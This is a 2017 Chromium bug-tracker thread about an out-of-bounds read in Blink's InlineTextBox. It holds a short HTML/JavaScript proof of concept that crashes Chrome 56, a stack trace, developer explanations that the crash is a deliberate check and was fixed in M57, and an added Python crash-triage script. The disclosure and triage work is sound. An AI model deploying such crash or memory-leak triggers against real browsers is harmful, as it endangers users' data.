Issue metadata
Out-of-bound read in layout
Reported by mishra.d...@gmail.com, Feb 23 2017
Issue description
UserAgent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:54.0) Gecko/20100101 Firefox/54.0
Steps to reproduce the problem: Upstream: 671328 OR 1024 (Project Zero)
The browser crashes when the code is executed.
Crash ID Chrome (Server ID: caf853d300000000)
I am able to replicate the issue in Chrome Stable in Linux and Windows.
However, in Chromium the InfoLeak works; attaching the POC for reference.
What is the expected behavior?
What went wrong?
Code :
<style>
  /* size/layout containment on the wrapper around the <select> */
  content { contain: size layout; }
</style>
<script>
  function leak() {
    // Select the whole document, then clear the option's text while the
    // selection still refers to it.
    document.execCommand("selectAll");
    opt.text = "";
  }
</script>
<body onload=leak()>
  <content>
    <select>
      <option id="opt">aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</option>
    </select>
  </content>
</body>
Demo URL: http://hackies.in/testc.html
Did this work before? N/A
Chrome version: 56.0.2924.87 (64-bit) Channel: stable
OS Version: 6.1 (Windows 7, Windows Server 2008 R2)
Flash Version: Shockwave Flash 24.0 r0
Comment 1 by kerrnel@chromium.org, Feb 23 2017
Sending to kojii who recently made a change in InlineTextBox::constructTextRun, can you please take a look?
Hi koji, I am not able to view Bug 671328. Please correct me if I am wrong; I saw the issue has been patched for Chrome 56. I tried replicating it and it works, so how is it a dup? Please advise.
Feb 24 2017
Oh, sorry, I wasn't aware of that. In M56, this crash is intentional. When we compute offsets incorrectly, we crash before reading the memory. So this is a crash, but not out-of-bound read. The root cause (that computes offsets incorrectly) was fixed in 57.0.2957.0, so M57 should not crash.
Feb 24 2017
Okay, and the second POC is of Chromium, where it leaks data.
Feb 24 2017
What is "the second POC"?
Feb 24 2017
https://bugs.chromium.org/p/project-zero/issues/detail?id=1024 I believe my POC matches the same.
Feb 24 2017
I'm terribly sorry, I can't understand what you're saying. Probably I'm wrong person for you to talk to, but I also don't know whom to assign this bug to. +ifratric@, do you know terminologies this person uses? Do you understand what is discussed here?
Feb 24 2017
The bug in Project Zero and the POC attached to it: I was able to replicate the same in the Chromium browser. Please have a look at my second POC and the POC of PZ bug 1024. I hope I made it a bit clearer.
Feb 24 2017
Hi, can you clarify what version of Chromium you managed to reproduce the infoleak in?
Feb 24 2017
In 55.0.2883.87 Built on Ubuntu.
Mar 2 2017
Our current stable release is 56.0.2924.87, and it looks like you used M56 to post this report. Is it possible to upgrade your Chromium to the latest?
Mar 3 2017
So, when I tried updating Chromium and running the above test case, Chromium crashes; stack trace below:
------
Chromium 56.0.2924.76 (Developer Build) Built on Ubuntu , running on Ubuntu 16.04 (64-bit)
Revision 314da7cc1e56fc9fa9271bac2b029922feb4b6f2
OS Linux
JavaScript V8 5.6.326.42
------
Received signal 4 ILL_ILLOPN 7fffd94af6ef
#0 0x7ffff78b602e base::debug::StackTrace::StackTrace()
#1 0x7ffff78b6423 <unknown>
#2 0x7ffff7bcb390 <unknown>
#3 0x7fffd94af6ef blink::InlineTextBox::constructTextRun()
#4 0x7fffd94afb00 blink::InlineTextBox::localSelectionRect()
#5 0x7fffd9456dd4 blink::LayoutText::localSelectionRect()
#6 0x7fffd9458fb5 blink::LayoutText::localVisualRect()
#7 0x7fffd94811b9 blink::PaintInvalidationState::computeVisualRectInBacking()
#8 0x7fffd9422444 blink::LayoutObject::invalidatePaintIfNeeded()
#9 0x7fffd941fd94 blink::LayoutObject::invalidateTreeIfNeeded()
#10 0x7fffd941ffbf blink::LayoutObject::invalidatePaintOfSubtreesIfNeeded()
#11 0x7fffd93c6242 blink::LayoutBoxModelObject::invalidateTreeIfNeeded()
#12 0x7fffd941ffbf blink::LayoutObject::invalidatePaintOfSubtreesIfNeeded()
#13 0x7fffd93c6242 blink::LayoutBoxModelObject::invalidateTreeIfNeeded()
#14 0x7fffd941ffbf blink::LayoutObject::invalidatePaintOfSubtreesIfNeeded()
#15 0x7fffd93c6242 blink::LayoutBoxModelObject::invalidateTreeIfNeeded()
#16 0x7fffd941ffbf blink::LayoutObject::invalidatePaintOfSubtreesIfNeeded()
#17 0x7fffd93c6242 blink::LayoutBoxModelObject::invalidateTreeIfNeeded()
#18 0x7fffd941ffbf blink::LayoutObject::invalidatePaintOfSubtreesIfNeeded()
#19 0x7fffd93c6242 blink::LayoutBoxModelObject::invalidateTreeIfNeeded()
#20 0x7fffd941ffbf blink::LayoutObject::invalidatePaintOfSubtreesIfNeeded()
#21 0x7fffd93c6242 blink::LayoutBoxModelObject::invalidateTreeIfNeeded()
#22 0x7fffd90d48b4 blink::FrameView::invalidateTreeIfNeeded()
#23 0x7fffd90d4b7b blink::FrameView::invalidateTreeIfNeededRecursiveInternal()
#24 0x7fffd90d4c8c blink::FrameView::invalidateTreeIfNeededRecursive()
#25 0x7fffd90d7acc blink::FrameView::updateLifecyclePhasesInternal()
#26 0x7fffd956d24d blink::PageAnimator::updateAllLifecyclePhases()
#27 0x7fffe624c997 blink::WebViewImpl::updateAllLifecyclePhases()
#28 0x7fffefcd746b cc::ProxyMain::BeginMainFrame()
#29 0x7fffefcdda7d <unknown>
#30 0x7ffff78b7563 base::debug::TaskAnnotator::RunTask()
#31 0x7fffe6756f7f blink::scheduler::TaskQueueManager::ProcessTaskFromWorkQueue()
#32 0x7fffe6757ae0 blink::scheduler::TaskQueueManager::DoWork()
#33 0x7ffff78b7563 base::debug::TaskAnnotator::RunTask()
#34 0x7ffff78dd760 base::MessageLoop::RunTask()
#35 0x7ffff78df35d base::MessageLoop::DeferOrRunPendingTask()
#36 0x7ffff78e01bd base::MessageLoop::DoWork()
#37 0x7ffff78e05a9 base::MessagePumpDefault::Run()
#38 0x7ffff78dcb42 base::MessageLoop::RunHandler()
#39 0x7ffff79054d8 base::RunLoop::Run()
#40 0x7ffff2516649 <unknown>
#41 0x7ffff2608068 <unknown>
#42 0x7ffff2608464 <unknown>
#43 0x7ffff26078e1 content::ContentMain()
#44 0x555555a6589c <unknown>
#45 0x7fffe26ff830 __libc_start_main
#46 0x555555a65769 <unknown>
  r8: 0000000000000000  r9: 0000000000000000 r10: 00000000000002d6 r11: 0000000000000009
 r12: 0000000000000040 r13: 00007fffffffc0a0 r14: 0000000000000000 r15: 000025b111450000
  di: 0000000000000060  si: 000025b111450000  bp: 00007fffffffc0a0  bx: 000032d41e005f30
  dx: 000004d2e4ccc680  ax: 0000000000000001  cx: 0000000000000000  sp: 00007fffffffbfa0
  ip: 00007fffd94af6ef efl: 0000000000010283 cgf: 0000000000000033 erf: 0000000000000000
 trp: 0000000000000006 msk: 0000000000000000 cr2: 0000000000000000
[end of stack trace]
[Thread 0x7fffc8d87700 (LWP 4925) exited]
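A small triage helper, added here as an example and not part of the report or of Chromium. It parses a crash dump of the shape posted above (an excerpt of that dump is embedded as the sample input), locates the frame at which the signal was raised by matching the saved ip register against the frame addresses rather than trusting frame #0 (the signal handler's own frames are printed first), and classifies the signal. A SIGILL or SIGTRAP at the faulting frame is consistent with the deliberate CHECK-style crash kojii describes for M56 (on x86-64 a compiler trap such as __builtin_trap executes ud2, which raises SIGILL), whereas a SIGSEGV or SIGBUS would mean an out-of-bounds access actually executed. The function names and the Linux signal-number table are this example's own assumptions.

```python
import re

# Excerpt of the crash dump posted in the comment above (Chromium
# 56.0.2924.76 on Ubuntu 16.04); frames #6..#46 are omitted here.
SAMPLE_DUMP = """\
Received signal 4 ILL_ILLOPN 7fffd94af6ef
#0 0x7ffff78b602e base::debug::StackTrace::StackTrace()
#1 0x7ffff78b6423 <unknown>
#2 0x7ffff7bcb390 <unknown>
#3 0x7fffd94af6ef blink::InlineTextBox::constructTextRun()
#4 0x7fffd94afb00 blink::InlineTextBox::localSelectionRect()
#5 0x7fffd9456dd4 blink::LayoutText::localSelectionRect()
  r8: 0000000000000000  r9: 0000000000000000 r10: 00000000000002d6 r11: 0000000000000009
  di: 0000000000000060  si: 000025b111450000  bp: 00007fffffffc0a0  bx: 000032d41e005f30
  ip: 00007fffd94af6ef efl: 0000000000010283 cgf: 0000000000000033 erf: 0000000000000000
 trp: 0000000000000006 msk: 0000000000000000 cr2: 0000000000000000
[end of stack trace]
"""

# Linux signal numbers (assumed mapping for this example).
SIGNAL_NAMES = {4: "SIGILL", 5: "SIGTRAP", 6: "SIGABRT", 7: "SIGBUS", 11: "SIGSEGV"}

FRAME_RE = re.compile(r"#(\d+)\s+0x([0-9a-f]+)\s+(\S.*)$")
SIGNAL_RE = re.compile(r"Received signal (\d+)\s+(\S+)\s+([0-9a-f]+)")
REG_RE = re.compile(r"\b([a-z0-9]{2,3}):\s*([0-9a-f]{16})")


def parse_crash(text):
    """Parse a Chromium-style crash dump into signal, frames and registers."""
    sig = SIGNAL_RE.search(text)
    if sig is None:
        raise ValueError("no 'Received signal' line found")
    frames = []  # (index, address, symbol)
    regs = {}
    for line in text.splitlines():
        m = FRAME_RE.match(line.strip())
        if m:
            frames.append((int(m.group(1)), int(m.group(2), 16), m.group(3).strip()))
            continue
        for name, value in REG_RE.findall(line):
            regs[name] = int(value, 16)
    return {
        "signo": int(sig.group(1)),
        "sigcode": sig.group(2),
        "fault_pc": int(sig.group(3), 16),
        "frames": frames,
        "regs": regs,
    }


def faulting_frame(crash):
    """Return (index, symbol) of the frame whose address equals the saved pc.

    The handler's own frames (StackTrace and two unknowns) sit above the
    faulting one, so frame #0 is not where the signal was raised.
    """
    pc = crash["regs"].get("ip", crash["fault_pc"])
    for idx, addr, sym in crash["frames"]:
        if addr == pc:
            return (idx, sym)
    return None


def classify(crash):
    """Say whether the signal looks like a deliberate trap or a memory fault."""
    name = SIGNAL_NAMES.get(crash["signo"], "signal %d" % crash["signo"])
    frame = faulting_frame(crash)
    where = frame[1] if frame else "<unknown frame>"
    if crash["signo"] in (4, 5):
        verdict = "deliberate trap (CHECK/IMMEDIATE_CRASH-style), not a memory access fault"
    elif crash["signo"] in (7, 11):
        verdict = "memory access fault: an out-of-bounds access actually executed"
    else:
        verdict = "unclassified"
    return {"signal": name, "code": crash["sigcode"], "frame": where, "verdict": verdict}


if __name__ == "__main__":
    result = classify(parse_crash(SAMPLE_DUMP))
    print("%(signal)s (%(code)s) in %(frame)s: %(verdict)s" % result)
```

On the sample this reports SIGILL (ILL_ILLOPN) in blink::InlineTextBox::constructTextRun() as a deliberate trap, which agrees with the explanation in the thread that M56 crashes before reading memory; a report that should be triaged as a genuine out-of-bounds read would instead show SIGSEGV with the offending address in the fault registers.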
Mar 3 2017
Yes, as noted in comment #6, M56 crashes before out-of-bound read. That is what issue 671328 fixed in M56; I mean, fixed to crash. M57 fixed the same in a different way, it doesn't crash. Is this satisfying for you, or is there anything more you need from us? Probably because I have little knowledge of what you work on, I don't know what we can do for you. Apologies for this difficult conversation.
Mar 3 2017
Okay sure, I got it. Thank you Kojii.
Jun 2 2017
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot